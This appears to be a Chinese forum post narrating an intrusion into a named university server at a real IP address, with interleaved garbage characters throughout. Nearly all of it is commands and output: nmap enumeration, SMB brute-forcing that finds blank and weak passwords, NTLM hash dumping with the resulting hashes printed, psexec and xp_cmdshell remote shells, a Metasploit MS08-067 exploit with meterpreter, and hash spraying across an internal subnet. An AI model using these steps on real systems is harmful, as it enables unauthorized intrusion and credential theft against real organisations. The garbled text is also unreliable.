广西师范网站http://202.103.242.241/
' a6 o; A, z, J! N" X @% { p# r! P9 j/ L+ q8 ~" I% G9 j# G
root@bt:~# nmap -sS -sV 202.103.242.2419 I* Y+ g3 F" E
+ F2 U3 }% f% O1 V, K2 i( T) F
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
: Y1 ^9 U! N. l
2 [0 |" P* e) a# XNmap scan report for bogon (202.103.242.241)
$ V; `, U4 e! @8 a
# b. s: N. s% K. J sHost is up (0.00048s latency).
2 A# B6 _/ f9 m; B7 Y, a2 A& _; c. h8 K7 t0 z" P; I8 \7 ^
Not shown: 993 closed ports
( v2 i) M+ o: }5 m
- j1 F( Z6 ] G; }PORT STATE SERVICE VERSION
8 i) d! i8 _- D6 C; t; d
5 I; D1 _& {" j" |1 E9 W4 U135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
+ _8 A% y, ?: a1 R8 Q7 s( ]; @1 j& _& I. d, O. }
139/tcp open netbios-ssn: D$ O/ x2 R/ ~" z3 M* `8 H
: N, _( P) }: @& [' \
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
, j8 h6 v9 x% m2 u
1 f0 A& y. c2 n9 f) p1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)" `. Y- Z; |3 x
( h/ K; l# ^1 e7 j. h1026/tcp open msrpc Microsoft Windows RPC
9 n, X) g4 l5 F& P7 A& I. p( A( T7 c- Q. s
3372/tcp open msdtc?0 a: u0 M5 ^/ D$ b% \9 }
$ Q! Y2 {( |7 D( b1 v7 r: G& h
3389/tcp open ms-term-serv?
& T0 s! W, V" F' }5 {+ h" e" m' d% |
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :/ c5 r' a i9 w
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r f( _4 C4 [2 l7 k! Q, O6 G
( O2 m* M0 @- p* m# Z3 {SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
3 i# t$ W ]* `( s$ Z. \6 ]/ k
. t9 c5 d7 s* w( ^SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)5 V }+ u- q$ h0 J2 y5 H
! h! M5 X( C4 V5 X+ |$ c
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO% w$ P+ A7 r. K$ P
( F4 b" Y5 E$ M5 {SF:ptions,6,”hO\n\x000Z”);
; y% M3 w/ T& x" S! d% V3 o: b& R2 C
. N) }+ l) g0 ^ r( v4 {& K0 iMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)9 H H7 @* Q4 v7 g- E4 h& z
( K4 g8 l) \, p8 L3 X! h
Service Info: OS: Windows
* I4 {2 H. d8 X4 X* D+ a: v' j& p0 ~5 g8 |/ p
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .9 \" N; R, p n3 B: b
% b5 [& q+ T7 }& F7 aNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
4 b4 T7 A. V% e2 U3 |+ B6 r/ c6 D4 B* }* c
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本3 W; z9 Y0 X$ ^- v
. ~% Y7 ?: Q" D-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse+ v' a, a9 j3 j; [( m$ C, l
3 F ?+ w0 y" g- F4 D1 O: R
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse- F4 S+ a2 |8 _ i/ k9 q
# V5 Y5 Z0 D+ g$ y0 b/ O8 o% K3 P
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
! _8 }6 S. H0 `% }1 d
( x V4 N. r5 s G( X* W N-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
1 @, u% M3 z, u6 {- i+ d6 H6 g1 T) D- C2 d' m0 o& _
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse! H8 P( a! q1 C! m
& n4 |2 n2 v6 l1 R3 A
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse& J( x; Z: B1 t* u. m
# g8 `# w% ]2 [" n7 L7 w-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse$ Y& q* }& e" K4 c
/ W: @9 e& B/ |
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
3 x \0 {/ B. d6 ?/ T. U E9 b. G9 x3 U& o$ j/ k
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
* d& s( K% O9 Q, ~; {/ r* y$ A" f% y6 P# ?- W0 f1 X& Y# e5 ]
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
! |% n7 F: c; p, y l) N' O ~
, O7 I4 v- x0 x) G6 c. `+ l-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
2 p. P- ?( M8 k/ @
) F; b" o2 G; _! B$ }6 o-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse7 B; l) j6 L8 o ]- s& m9 ^' v0 }
8 r6 X9 H3 t. M3 c l* N9 U-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse5 g3 g2 u: k5 g) F
2 m8 U( v: P) I% W$ U8 r
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
% {2 c3 l, L1 S0 Y# p* S5 W1 z0 S( G6 ?9 N0 _4 h8 B/ X% S
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
( _0 M' U+ k( b, S
" [8 d1 z& @2 d7 N; @5 Groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
% I7 p) s- }' f* d7 C1 z/ u- |! P* _
//此乃使用脚本扫描远程机器所存在的账户名 K* V% M) A, h! T% |3 ~
2 Q, G/ C% z0 g$ T# _Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
: H4 {- r' ^$ X6 _$ \% j- V9 l+ ` d4 Q/ w
Nmap scan report for bogon (202.103.242.241)0 |2 Z/ d2 c$ S; x: N! y. {
- ?& o) j [) ?" M, T' tHost is up (0.00038s latency).
! M& V7 p- w9 L( e+ i0 _0 c
: h4 w! `# _& W4 t: A% J3 m4 mNot shown: 993 closed ports: g; L7 E5 }% c$ O
# p4 C7 ?0 `6 w4 q* w1 q1 P
PORT STATE SERVICE
) O b* e, f" ~: K8 q7 K" \$ f- |% ^# H3 u# d; ~' c `
135/tcp open msrpc" X! o; t5 E! L( C8 c2 j+ a
/ j: S% I6 a9 d! F139/tcp open netbios-ssn
5 d9 E- R, S/ k7 N; V: c9 R H& B
& j; e+ M j8 g! [ D445/tcp open microsoft-ds- g- m8 K: W/ w& ?$ T5 @7 o
& v5 [/ R$ w8 g1025/tcp open NFS-or-IIS( t @& V1 w0 d6 k1 P
' E; C0 y0 o9 }5 A+ \
1026/tcp open LSA-or-nterm0 K6 P6 i# a# V" @- `9 l" @1 k7 ~
% }* l, B3 {( S$ Q9 n8 a: h" t
3372/tcp open msdtc1 T/ F* ]- h0 C F# n" h S/ Q" L
; ~6 x/ Q' a9 ^3389/tcp open ms-term-serv# h9 {- P# c3 ~# m% y
7 T( l5 \8 b' f5 i- O7 J' V. yMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 w* }3 W/ V( f3 V8 S% Y( G
& @% ]3 d- p7 s- y1 H
Host script results:' O v! z& T4 L7 T
& {, j0 ~) V. R& m1 y, a* L2 j. V| smb-enum-users:
3 |" ?( B7 ~, [3 X6 s/ p/ L3 m1 \" b8 z m4 N
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果, o* X( n& e5 Z o
7 X Z4 k4 j) S1 G) P3 r3 T# f( nNmap done: 1 IP address (1 host up) scanned in 1.09 seconds( X- Q; l7 P6 `* q9 {( e0 o$ j1 {
) W. z% G+ k/ B8 Z* x8 j Qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 8 J! m1 g2 Y5 w4 @" W- f
6 I% x& {2 F7 z r& z, y
//查看共享
9 }6 `) v. G/ x R7 C% g- q' @) q. w+ \4 g
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
2 f$ ~3 L* D( q8 x2 Y
- [2 H! y6 g% l0 N3 |" vNmap scan report for bogon (202.103.242.241)
6 a( v: Z2 a- W4 o, a. _: O7 ?/ j: z! K: J, v
Host is up (0.00035s latency).% I4 F* R [* q+ B( K
# d5 b5 ^- W4 l6 z+ L9 d8 K& l. gNot shown: 993 closed ports9 _7 N7 i% X* T. j. y
' \; ~: E% J: ?( A# x) ~
PORT STATE SERVICE
- i" Q% J! @6 H1 u7 B) u- m, x$ N$ N& j, k' J' W6 x! Q5 Y* J
135/tcp open msrpc4 o. J; z% W/ B' Q& F
3 P2 U5 S% N! ^% z- Y
139/tcp open netbios-ssn
|! D# J( \( a) D, n! ^+ ^# o' s0 E! h& g8 l
445/tcp open microsoft-ds
" Q/ T2 ^/ z+ U6 m! }% j0 | ]1 D4 Y9 r
1025/tcp open NFS-or-IIS! Z6 b5 W- ^7 o
" J; ~$ `9 w! h$ b- k
1026/tcp open LSA-or-nterm9 v9 i; |$ S# T7 k; P
& v9 N) b* D6 T/ v% m4 j" b+ I3 G1 M3372/tcp open msdtc5 f9 j7 B- I( _
8 Y% u* d( D1 F8 ^
3389/tcp open ms-term-serv, m0 E- Z) U$ j) \
- J3 }' N+ u" @2 k4 aMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- p _$ ?7 A) W
& E }. `4 x4 E4 J$ ^) P4 K& h1 WHost script results:
8 P# ~" u4 f- z/ p% N
2 c$ K" _# Z4 g0 }6 K| smb-enum-shares:
* e5 r/ d# r9 b/ t9 G! h6 ^; e
7 e' L/ C3 ^1 [1 w( n4 x| ADMIN$, W; m) h O( ]" o+ s/ M
( U q4 C) G5 J7 D" r y. m* K| Anonymous access: <none># h' {; w1 o+ D' T$ ]* t
0 l8 e5 C1 p+ R" J* T
| C$9 d$ n- i2 ]& v; |
% w" p" f+ E3 G! y5 p& M| Anonymous access: <none>
, J$ A# T0 }4 V% s
* {" A+ \9 ]) p( g, ~3 m4 u| IPC$
- B$ ` u) j5 \$ S! f: w u% L
, Y; ^; W! t, o( z; H1 d8 ]|_ Anonymous access: READ. b* T' J0 B1 t- z1 ~) w4 B
- T" g2 R3 K8 ~Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
9 W/ `$ e* i& G) S" Z
9 W2 ]+ i. |8 c& Q! M! Qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
' {4 w" D9 @: a& S9 {9 y5 j# |
; T9 Y& O( g0 V//获取用户密码/ L& J8 ?* O4 O
; `& [. B4 C9 }/ C8 V8 i! \ KStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
( Q+ n: v7 D* l# r! y1 h, `+ r+ u5 O' h; R0 J5 I, ]
Nmap scan report for bogon (202.103.242.2418)3 E: |0 L- K9 t5 C; J
/ t: s' Q) I7 { BHost is up (0.00041s latency).
; t% @$ f* Z9 W! y4 t/ I
9 T' ` L) y6 `+ l! @Not shown: 993 closed ports6 v9 g2 i( i3 A* f y
( G5 c& [+ w& l) GPORT STATE SERVICE
* N# s, { S, N8 ], h( h6 k& _, r& r4 f
135/tcp open msrpc( x3 u3 \8 m- d; ? k
, X$ u; G3 s4 e: ]- X7 D
139/tcp open netbios-ssn/ f9 T# v; {' g8 R+ S
# Q. i% n3 g7 W8 e+ d6 f2 R
445/tcp open microsoft-ds; M3 _0 Q+ w5 X
/ E/ @3 y+ ?- A6 D9 {8 [7 T. s1025/tcp open NFS-or-IIS( {; r M2 s# B$ g
" T" S5 c' m9 J- o* w: h! [# f1 T
1026/tcp open LSA-or-nterm
, ~% {2 U, x: D+ w ~8 |9 P& o7 M0 v0 j/ K+ o5 s7 [+ e
3372/tcp open msdtc
, q2 d" k' R0 b7 Z8 a: M! P
3 [/ ?3 O! v W6 V3389/tcp open ms-term-serv, L( U6 Z1 e" G$ y( ^+ B
, Q" c# M; o0 r7 ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); C6 V" O' M+ P! E6 a
) ^3 W, z+ U5 DHost script results:# W. i) w; s5 A8 [
: h2 r; J! x' `/ s| smb-brute:
- u7 r1 n1 g" |; f* V: g" R# o9 e% g; p: u' S1 Z& o7 U
administrator:<blank> => Login was successful( X m1 G( u) B) [; l
1 S2 y. f9 H0 b2 [( u1 ||_ test:123456 => Login was successful
+ R4 _7 R$ T# ^6 G
1 N2 {3 Y/ }6 Y) v; LNmap done: 1 IP address (1 host up) scanned in 28.22 seconds9 w8 O0 m- P3 Z9 ?% S" o# p
D/ a0 c0 F6 l1 m8 Zroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
; W+ w! a0 t8 Z
9 O; S! c0 G2 o) {root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
* ?& z' Q9 N5 i% L. F3 x# J7 u" C3 V+ c$ ]' K
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
" W. M* t/ V: d+ x ]7 L' A K% X& U* j4 O0 L: Q
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
G5 ?6 ^, s, i- h( o' c; o5 d% Q1 `& U* j$ m, s( \" A- D
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
6 F1 ]6 [0 X* ?: [4 u
4 k; K* g9 l: T+ e0 q1 R7 TNmap scan report for bogon (202.103.242.241)
9 k- N: A& F9 A* \2 Q7 m
1 L1 x$ w* a, C. oHost is up (0.0012s latency).
2 g. j6 J* p2 B; ~6 I
k0 W/ W E: a# I6 X9 G1 xPORT STATE SERVICE
2 c7 y. B) a& z( L3 s& B
0 z3 ^9 t4 q: E- P135/tcp open msrpc: f) R5 A, G& S0 ~
/ R/ N- {1 Q' U4 r139/tcp open netbios-ssn8 W& ]) e( `- B4 z( S @; s
6 P% }9 ]( Z, H: P# f* t+ U
445/tcp open microsoft-ds: I6 Q9 c( ~) B3 y
8 f2 M' h4 Q: Q/ v- e+ N7 O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 V% ~/ x7 E j+ y: \2 O9 b0 c3 X7 N' F# G3 O
Host script results:
B, d* t \$ v/ [6 \. P" F! V3 T3 R; Q9 n0 ]+ V. E
| smb-pwdump:: b1 C$ O4 ?7 b; P2 H7 u3 {
- t5 ?! @1 s7 i+ f| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************: m& V& W! o0 b7 T3 w
& N1 u: \& R8 R: g6 J1 K| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************8 Z! l3 Q" {- z t
/ E+ l! V0 i7 m
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4: [6 t7 F0 g: K, X* a
8 |: W7 O+ O- `% ^|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
0 ]; D2 N5 i6 r2 n' Y# n* m+ d2 p3 x% ?0 z1 C% P. K
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
4 Y$ j; X9 w, H) W% J9 p( \, g0 {) n9 P* D! g) }7 V; k
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
1 G4 B7 W" S$ g" O' ], {# Y% D( N% D; G
-p 123456 -e cmd.exe! r9 D8 F. v: C
Y) h N$ g; h: P& n
PsExec v1.55 – Execute processes remotely1 e3 E0 l$ A& i& D- ]
! _: S: U% J- G: w* sCopyright (C) 2001-2004 Mark Russinovich# a' D& N: F6 c' J) ?
. U- x T) E6 `' K" f
Sysinternals – www.sysinternals.com) h. d D7 ]+ p3 L8 f; [; d. N
6 B+ K/ x+ a. f$ F: VMicrosoft Windows 2000 [Version 5.00.2195]
' h1 E8 c3 P( N% c4 [. Z) N( H, O! [" j' \' a; ~5 P
(C) 版权所有 1985-2000 Microsoft Corp.
. i+ N) ^& A9 ?4 ?# F, {0 V0 k, V [1 f* B u C; A
C:\WINNT\system32>ipconfig- J4 C1 g) t/ B
. u4 c$ K) d, T0 B8 l" f3 z
Windows 2000 IP Configuration* h9 K; p6 c$ D) i
: c# ]/ Z; s' L6 l( Y- }1 t" |8 rEthernet adapter 本地连接:" }) Q% D) _) O# [0 z
8 V, d9 M0 Y4 ^Connection-specific DNS Suffix . :& t4 S1 G) S4 H
" F6 {# p& [+ o# }5 X1 L2 ^
IP Address. . . . . . . . . . . . : 202.103.242.241+ o$ @' [" o. J/ \6 s* a* @
- N- l& B/ F5 k" K. J" q4 p5 \5 `
Subnet Mask . . . . . . . . . . . : 255.255.255.0
$ ^) l; }& {! C1 K* o* M4 T2 Q" y X
Default Gateway . . . . . . . . . : 202.103.1.1
0 I7 r% j3 i" x/ r# ?+ Y0 o; T1 E3 S# {( I0 M. T8 ]
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令- C. J3 P$ b5 z% K2 ?
& t/ N0 y; x3 t. Y
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞7 I! v# k6 }8 c6 [9 }) l
! T9 U* V: O# c: I$ }5 N
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST- H6 m; T7 a1 U; d% V/ W
; ?1 u4 T9 L8 `' r; N b5 v" mNmap scan report for bogon (202.103.242.241)
$ Q$ @6 y; `6 ~1 i g7 ^- e
! Q: K$ n6 R1 C) DHost is up (0.00046s latency).+ L- V3 |& K4 f7 P3 c$ f- K3 H {
6 A; Q1 T6 Y( Y/ h( X7 x) j! LNot shown: 993 closed ports: _, D( H2 J7 D( c m7 B7 |( A
* _; |8 B1 b& s3 L9 }* ?$ r& FPORT STATE SERVICE; s& J6 ]. m9 r& o. j
B4 F9 j- v& a* x9 F135/tcp open msrpc
% Q: d, v( g. e7 a' a# x# ]3 m, j: y% ]. z
139/tcp open netbios-ssn
+ d" M. `8 z9 I2 E. s: q. `2 x: Z9 \, E) R9 l7 y
445/tcp open microsoft-ds
" D% m9 p) Y$ ~7 c8 \
" i' a! V L( l1025/tcp open NFS-or-IIS
0 N3 _0 `6 e3 O( M$ d* e* w. `9 C3 m' x/ M, K! v/ v1 d
1026/tcp open LSA-or-nterm$ |, m* Z* v. g9 O0 O7 g `
# d3 g; H. m y. j+ H3372/tcp open msdtc2 O' N, V6 O( p! {3 s* U+ D3 S6 W
+ T1 `9 S5 O) U- ]8 r3389/tcp open ms-term-serv
1 f3 w8 C9 H6 `' n: T# N4 {8 z7 [4 @% O+ C; E
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* R2 c2 N! S- {! I3 d3 q0 k7 T
1 |5 Y5 H- c" s# j8 W" N" a8 u0 q
Host script results:) }2 B: ]$ H' K6 F0 K
' ^5 t. F8 h3 l8 || smb-check-vulns:2 t) r5 i* U5 c( g& S2 H f( n
' {/ j6 W, A9 I# \6 O5 Y
|_ MS08-067: VULNERABLE
0 B8 A G/ D3 @( f( d8 d/ E1 [- G2 o0 P. h
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
, }: Q& P6 y8 U9 x) }8 X( y' {
* A8 U5 T& n& _8 M: C& qroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
. a' Z& h, s/ ?' F" d- |" n. O. k5 r, p+ q. w5 | s
msf > search ms088 Y l3 J, }9 W. p& |
4 v Z8 J4 u) u0 p/ K
msf > use exploit/windows/smb/ms08_067_netapi
; h7 D b+ O7 c9 M
: s, |$ Y. B, ~2 pmsf exploit(ms08_067_netapi) > show options0 I2 A. R) I' g' y" X
, l- s0 `/ F: {1 Wmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
: A% V: A9 ^1 e! r" ^! T6 M* L. v I8 @! ]
msf exploit(ms08_067_netapi) > show payloads
2 C( ?0 R0 K1 ?6 L* E
- _8 `# H9 U5 E2 a$ }msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
9 c7 w t, R( g$ b
. D- F' `6 i7 r! U% Hmsf exploit(ms08_067_netapi) > exploit
; G, _6 v- N& `9 x& R# [( ~. {" H0 h# Z, l1 j. S3 v' r7 ]
meterpreter >9 m( ], W3 K9 n9 H# o6 S: \* L
; a" Q% e% U c6 B
Background session 2? [y/N] (ctrl+z)& _3 e- D* S$ O6 k; e8 f
6 \1 e! T7 R# S0 Z$ ymsf exploit(ms08_067_netapi) > sessions -l
1 x6 H$ u k5 B- n/ u j' N7 b
% B# U- O9 \! A2 a* z( {3 |root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
& H% u; g7 z2 E6 Z$ E& R* w* u8 Q0 a4 V" q( v3 ]4 @
test
6 y6 z$ _; B, z2 B! F# ~7 r. B
* u; }$ H9 x: E! E0 N! R" f; Xadministrator) U% q# k# ?+ m, u& x
9 z/ Y* I, x7 o! D1 z$ q5 O
root@bt:/usr/local/share/nmap/scripts# vim password.txt% ]$ `! ~% h( F( R, O8 U
2 `& ~4 i, K. S3 u- n D
44EFCE164AB921CAAAD3B435B51404EE
9 k: c. O. K9 B* c, [1 O6 K6 T6 `3 z `) o4 U9 \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
5 U$ D( S7 Y% N( {0 i9 u
, `: Z; |' Q- R8 m$ I \$ | //利用用户名跟获取的hash尝试对整段内网进行登录
3 I3 F. V2 z$ t5 \! U' B; d$ E
& J8 |# r7 p/ w- s* hNmap scan report for 192.168.1.105
$ L- z H; p( J, r1 e
* V% F" E9 f5 j4 T! ^: ^Host is up (0.00088s latency).
- b" ^% L; l- v9 E
/ ^; Z5 R8 L$ TNot shown: 993 closed ports
! Y" V# b/ Y3 y8 p) k/ @
! D3 r9 F4 {6 q5 NPORT STATE SERVICE
& M0 u3 O3 G2 x
6 A+ m+ {9 N7 S6 Z. c' w5 Z135/tcp open msrpc6 v; i7 ^6 d, E1 _# i/ J* c$ `
5 n% L" Y9 n( u, X" c/ l139/tcp open netbios-ssn
3 J. c7 \( W( I
( S6 A$ a( v X- Q445/tcp open microsoft-ds
& K% e8 L/ ]/ a" |8 J
# M2 K; y+ k. I1 a% A' M1025/tcp open NFS-or-IIS1 J# d* q8 N1 Q6 I' I
8 e( Y6 t) w& c1 t$ P
1026/tcp open LSA-or-nterm
. L; K8 K' H" ]- v; s6 X# z1 ?( W) g* A1 X8 H" t* {
3372/tcp open msdtc3 c7 d8 v* U# ?3 ]9 P
: f! h! k9 F$ k3 E+ o4 w/ N3389/tcp open ms-term-serv
1 i1 n o" k2 }5 ]/ B# j' u/ H$ ?' P( t& {" U% G, X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& e: [2 J, ~( Q8 ^4 q
6 L% ^1 J7 |5 B$ ?" H5 V- V' o/ wHost script results:* a* U! r& N c0 _, Y* Q1 z
# T* m6 C2 E9 u5 [- ]| smb-brute:
1 y: L6 Y$ \3 Q, m" f
/ O$ D0 Y$ b+ C/ R( J|_ administrator:<blank> => Login was successful
. q2 h# `/ g j# ~; ~
$ m1 @; p( Z' c9 f% |) d% U攻击成功,一个简单的msf+nmap攻击~~·
* O- j& N% c1 \8 e4 k6 w! v, d: H1 k7 [( x. g( z7 S0 S$ q# Y# `
|
发表于 2012-12-4 12:46:42
收藏
支持
反对